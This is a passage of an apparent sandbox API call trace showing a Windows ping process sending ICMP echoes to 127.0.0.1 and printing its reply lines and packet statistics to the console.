(_FileHandle=1) returned 0x28 [0088.985] GetFileType (hFile=0x28) returned 0x2 [0088.985] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0088.985] GetLastError () returned 0x6 [0088.985] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✼") returned 0x0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.985] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.985] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0088.985] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0088.985] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.985] LocalFree (hMem=0xad8aa8) returned 0x0 [0088.985] LocalFree (hMem=0xae7b08) returned 0x0 [0088.985] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xa4f3d4, nSize=0x0, Arguments=0xa4f3d0 | out: lpBuffer="笈®ﶤ¤➷\x94䰨盪✧") returned 0x9 [0088.985] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.985] GetFileType (hFile=0x28) returned 0x2 [0088.985] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f398 | out: lpMode=0xa4f398) returned 0 [0088.985] GetLastError () returned 0x6 [0088.985] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2fc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.985] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.985] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0088.985] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0088.986] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.986] _fileno (_File=0x76ea4c28) returned 1 [0088.986] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.986] LocalFree (hMem=0xad8aa8) returned 0x0 [0088.986] LocalFree (hMem=0xae7b08) returned 0x0 [0088.986] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="笈®ﶤ¤⟘\x94䰨盪✨") returned 0x9 [0088.986] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.986] _fileno (_File=0x76ea4c28) returned 1 [0088.986] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.986] GetFileType (hFile=0x28) returned 0x2 [0088.986] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0088.986] GetLastError () returned 0x6 [0088.986] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✨") returned 0x0 [0088.986] _fileno (_File=0x76ea4c28) returned 1 [0088.986] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0088.986] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.986] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0088.986] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0088.986] _fileno (_File=0x76ea4c28) returned 1 [0088.986] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0088.986] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.986] _fileno (_File=0x76ea4c28) returned 1 [0088.986] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0088.986] LocalFree (hMem=0xad8aa8) returned 0x0 [0088.986] LocalFree (hMem=0xae7b08) returned 0x0 [0088.986] Sleep (dwMilliseconds=0x3e8) [0089.996] IcmpSendEcho2Ex (in: IcmpHandle=0xad6c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xadc4a8, RequestSize=0x20, RequestOptions=0xa4f44c, ReplyBuffer=0xae5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xae5270) returned 0x1 [0089.997] InetNtopW (in: Family=2, pAddr=0xa4f43c, pStringBuf=0xa4f564, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0089.997] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="羠®ﶤ¤⛔\x94䰨盪✣") returned 0x16 [0089.997] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.997] _fileno (_File=0x76ea4c28) returned 1 [0089.997] _get_osfhandle (_FileHandle=1) returned 0x28 [0089.997] GetFileType (hFile=0x28) returned 0x2 [0089.997] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0089.997] GetLastError () returned 0x6 [0089.997] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✣") returned 0x0 [0089.997] _fileno (_File=0x76ea4c28) returned 1 [0089.997] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0089.997] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0089.997] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xae7fd8 [0089.997] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xae7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _write (in: _FileHandle=1, _Buf=0xae7fd8*, _MaxCharCount=0x16 | out: _Buf=0xae7fd8*) returned 22 [0089.998] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0089.998] LocalFree (hMem=0xae7fd8) returned 0x0 [0089.998] LocalFree (hMem=0xae7fa0) returned 0x0 [0089.998] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="羠®ﶤ¤⛿\x94䰨盪✼") returned 0x9 [0089.998] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _get_osfhandle (_FileHandle=1) returned 0x28 [0089.998] GetFileType (hFile=0x28) returned 0x2 [0089.998] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0089.998] GetLastError () returned 0x6 [0089.998] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✼") returned 0x0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0089.998] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0089.998] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8988 [0089.998] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xad8988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _write (in: _FileHandle=1, _Buf=0xad8988*, _MaxCharCount=0x9 | out: _Buf=0xad8988*) returned 9 [0089.998] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0089.998] LocalFree (hMem=0xad8988) returned 0x0 [0089.998] LocalFree (hMem=0xae7fa0) returned 0x0 [0089.998] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xa4f3d4, nSize=0x0, Arguments=0xa4f3d0 | out: lpBuffer="羠®ﶤ¤➷\x94䰨盪✧") returned 0x9 [0089.998] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _get_osfhandle (_FileHandle=1) returned 0x28 [0089.998] GetFileType (hFile=0x28) returned 0x2 [0089.998] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f398 | out: lpMode=0xa4f398) returned 0 [0089.998] GetLastError () returned 0x6 [0089.998] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2fc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0089.998] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0089.998] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0089.998] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0089.998] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.998] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0089.998] LocalFree (hMem=0xad8aa8) returned 0x0 [0089.998] LocalFree (hMem=0xae7fa0) returned 0x0 [0089.998] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="羠®ﶤ¤⟘\x94䰨盪✨") returned 0x9 [0089.998] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.998] _fileno (_File=0x76ea4c28) returned 1 [0089.999] _get_osfhandle (_FileHandle=1) returned 0x28 [0089.999] GetFileType (hFile=0x28) returned 0x2 [0089.999] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0089.999] GetLastError () returned 0x6 [0089.999] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✨") returned 0x0 [0089.999] _fileno (_File=0x76ea4c28) returned 1 [0089.999] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0089.999] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0089.999] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0089.999] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0089.999] _fileno (_File=0x76ea4c28) returned 1 [0089.999] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0089.999] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0089.999] _fileno (_File=0x76ea4c28) returned 1 [0089.999] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0089.999] LocalFree (hMem=0xad8aa8) returned 0x0 [0089.999] LocalFree (hMem=0xae7fa0) returned 0x0 [0089.999] Sleep (dwMilliseconds=0x3e8) [0091.012] IcmpSendEcho2Ex (in: IcmpHandle=0xad6c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xadc4a8, RequestSize=0x20, RequestOptions=0xa4f44c, ReplyBuffer=0xae5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xae5270) returned 0x1 [0091.013] InetNtopW (in: Family=2, pAddr=0xa4f43c, pStringBuf=0xa4f564, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0091.013] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="羠®ﶤ¤⛔\x94䰨盪✣") returned 0x16 [0091.013] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.013] _fileno (_File=0x76ea4c28) returned 1 [0091.013] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.013] GetFileType (hFile=0x28) returned 0x2 [0091.013] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0091.013] GetLastError () returned 0x6 [0091.013] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✣") returned 0x0 [0091.013] _fileno (_File=0x76ea4c28) returned 1 [0091.013] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.013] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0091.013] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xae7fd8 [0091.013] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xae7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0091.013] _fileno (_File=0x76ea4c28) returned 1 [0091.013] _write (in: _FileHandle=1, _Buf=0xae7fd8*, _MaxCharCount=0x16 | out: _Buf=0xae7fd8*) returned 22 [0091.013] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.013] _fileno (_File=0x76ea4c28) returned 1 [0091.013] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.013] LocalFree (hMem=0xae7fd8) returned 0x0 [0091.013] LocalFree (hMem=0xae7fa0) returned 0x0 [0091.014] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="羠®ﶤ¤⛿\x94䰨盪✼") returned 0x9 [0091.014] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.014] GetFileType (hFile=0x28) returned 0x2 [0091.014] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0091.014] GetLastError () returned 0x6 [0091.014] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✼") returned 0x0 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.014] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0091.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0091.014] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.014] LocalFree (hMem=0xad8aa8) returned 0x0 [0091.014] LocalFree (hMem=0xae7fa0) returned 0x0 [0091.014] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xa4f3d4, nSize=0x0, Arguments=0xa4f3d0 | out: lpBuffer="羠®ﶤ¤➷\x94䰨盪✧") returned 0x9 [0091.014] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.014] GetFileType (hFile=0x28) returned 0x2 [0091.014] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f398 | out: lpMode=0xa4f398) returned 0 [0091.014] GetLastError () returned 0x6 [0091.014] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2fc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.014] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8aa8 [0091.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xad8aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _write (in: _FileHandle=1, _Buf=0xad8aa8*, _MaxCharCount=0x9 | out: _Buf=0xad8aa8*) returned 9 [0091.014] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.014] _fileno (_File=0x76ea4c28) returned 1 [0091.014] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0091.014] LocalFree (hMem=0xad8aa8) returned 0x0 [0091.014] LocalFree (hMem=0xae7fa0) returned 0x0 [0091.014] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="羠®ﶤ¤⟘\x94䰨盪✨") returned 0x9 [0091.015] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.015] GetFileType (hFile=0x28) returned 0x2 [0091.015] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0091.015] GetLastError () returned 0x6 [0091.015] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✨") returned 0x0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0091.015] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.015] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xad8ac0 [0091.015] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xad8ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _write (in: _FileHandle=1, _Buf=0xad8ac0*, _MaxCharCount=0x9 | out: _Buf=0xad8ac0*) returned 9 [0091.015] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0091.015] LocalFree (hMem=0xad8ac0) returned 0x0 [0091.015] LocalFree (hMem=0xae7fa0) returned 0x0 [0091.015] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xa4f358, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0091.015] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xa4f32c, nSize=0x0, Arguments=0xa4f328 | out: lpBuffer="羠®¤᧰\x94䰨盪❏") returned 0x5c [0091.015] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.015] GetFileType (hFile=0x28) returned 0x2 [0091.015] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f2f0 | out: lpMode=0xa4f2f0) returned 0 [0091.015] GetLastError () returned 0x6 [0091.015] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f254, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0091.015] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0091.015] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xae8068 [0091.015] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xae8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _write (in: _FileHandle=1, _Buf=0xae8068*, _MaxCharCount=0x5c | out: _Buf=0xae8068*) returned 92 [0091.015] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0091.015] LocalFree (hMem=0xae8068) returned 0x0 [0091.015] LocalFree (hMem=0xae7fa0) returned 0x0 [0091.015] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xa4f338, nSize=0x0, Arguments=0xa4f334 | out: lpBuffer="羠®¤ᨧ\x94䰨盪❓") returned 0x61 [0091.015] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0091.015] _fileno (_File=0x76ea4c28) returned 1 [0091.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.015] GetFileType (hFile=0x28) returned 0x2 [0091.015] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f2fc | out: lpMode=0xa4f2fc) returned 0 [0091.015] GetLastError () returned 0x6 [0091.015] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f260, nSize=0x50 | out: lpBuffer="¤❓") returned 0x0 [0091.016] _fileno (_File=0x76ea4c28) returned 1 [0091.016] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0091.016] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0091.016] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xae8070 [0091.016] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xae8070, cbMultiByte=98, 